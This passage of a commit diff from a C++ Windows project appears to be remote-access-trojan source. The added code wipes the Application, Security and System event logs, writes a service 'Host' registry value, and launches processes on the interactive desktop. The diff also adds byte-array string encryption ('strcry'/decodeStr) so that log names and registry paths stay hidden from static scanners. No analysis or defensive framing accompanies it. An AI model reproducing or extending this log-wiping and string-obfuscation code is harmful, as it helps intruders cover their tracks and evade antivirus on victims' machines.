RegCloseKey(hKey);
|
||||
|
||||
@@ -221,17 +251,35 @@ bool OpenURL(LPCTSTR lpszURL, INT nShowCmd)
|
||||
STARTUPINFO si = {0};
|
||||
PROCESS_INFORMATION pi;
|
||||
si.cb = sizeof si;
|
||||
|
||||
//strcry
|
||||
char WinSta0[] = { 0x0f,0x9c,0xa3,0xa7,0x9b,0xb3,0xa7,0xf5,0x98,0x87,0xa7,0xa7,0xa1,0xca,0xd2,0xc9 }; //WinSta0\Default
|
||||
char* pWinSta0 = decodeStr(WinSta0); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
|
||||
if (nShowCmd != SW_HIDE)
|
||||
si.lpDesktop = "WinSta0\\Default";
|
||||
si.lpDesktop = pWinSta0;
|
||||
|
||||
CreateProcess(NULL, strIEPath, NULL, NULL, false, 0, NULL, NULL, &si, &pi);
|
||||
|
||||
memset(pWinSta0, 0, WinSta0[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pWinSta0;
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void CleanEvent()
|
||||
{
|
||||
char *strEventName[] = {"Application", "Security", "System"};
|
||||
//strcry Application Security System
|
||||
char Application[] = { 0x0b,0x8a,0xba,0xb9,0xa4,0xae,0xa5,0xa4,0xb0,0xaa,0xad,0xaf };
|
||||
char Security[] = { 0x08,0x98,0xaf,0xaa,0xbd,0xb5,0xaf,0xb1,0xbd };
|
||||
char System[] = { 0x98,0xb3,0xba,0xbc,0xa2,0xab };
|
||||
|
||||
char *strEventName[3];
|
||||
strEventName [0] = decodeStr(Application);
|
||||
strEventName [1] = decodeStr(Security);
|
||||
strEventName [2] = decodeStr(System);
|
||||
|
||||
for (int i = 0; i < sizeof(strEventName) / sizeof(int); i++)
|
||||
{
|
||||
@@ -241,14 +289,35 @@ void CleanEvent()
|
||||
ClearEventLog(hHandle, NULL);
|
||||
CloseEventLog(hHandle);
|
||||
}
|
||||
memset(strEventName[0], 0, Application[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[0];
|
||||
memset(strEventName[1], 0, Security[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[1];
|
||||
memset(strEventName[2], 0, System[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete strEventName[2];
|
||||
}
|
||||
|
||||
void SetHostID(LPCTSTR lpServiceName, LPCTSTR lpHostID)
|
||||
{
|
||||
char strSubKey[1024];
|
||||
memset(strSubKey, 0, sizeof(strSubKey));
|
||||
wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
|
||||
|
||||
|
||||
//strcry SYSTEM\CurrentControlSet\Services\%s
|
||||
char Services[] = { 0x24,0x98,0x93,0x9a,0x9c,0x82,0x8b,
|
||||
0x99,0x87,0xb6,0xb0,0xb3,0xa5,0xd1,0xca,0xfe,0xd3,
|
||||
0xd5,0xce,0xcb,0xd7,0xdb,0xe5,0xd0,0xc0,0xef,0xe1,
|
||||
0xd4,0xc2,0xd9,0xc7,0xce,0xc9,0xd8,0xf6,0x8c,0xdb }; //WinSta0\Default
|
||||
char* pServices = decodeStr(Services); //<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
|
||||
|
||||
//wsprintf(strSubKey, "SYSTEM\CurrentControlSet\Services\%s", lpServiceName);
|
||||
wsprintf(strSubKey, pServices, lpServiceName);
|
||||
WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "Host", REG_SZ, (char *)lpHostID, lstrlen(lpHostID), 0);
|
||||
|
||||
memset(pServices, 0, Services[STR_CRY_LENGTH]); //<2F><><EFBFBD><EFBFBD>0
|
||||
delete pServices;
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -39,10 +39,10 @@ char* uncode(char* str)
|
||||
|
||||
int main()
|
||||
{
|
||||
char a[] = "Mozilla/4.0 (compatible)";
|
||||
char b[] = "VideoCapWindow";
|
||||
char c[] = "LyxInstaller.exe";
|
||||
char d[] = "%-24s %-15s 0x%x";
|
||||
char a[] = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
|
||||
char b[] = "Security";
|
||||
char c[] = "System";
|
||||
char d[] = "Application";
|
||||
char* s1 = crycode(a);
|
||||
char* s2 = crycode(b);
|
||||
char* s3 = crycode(c);
|
||||
|
||||
Reference in New Issue
Block a user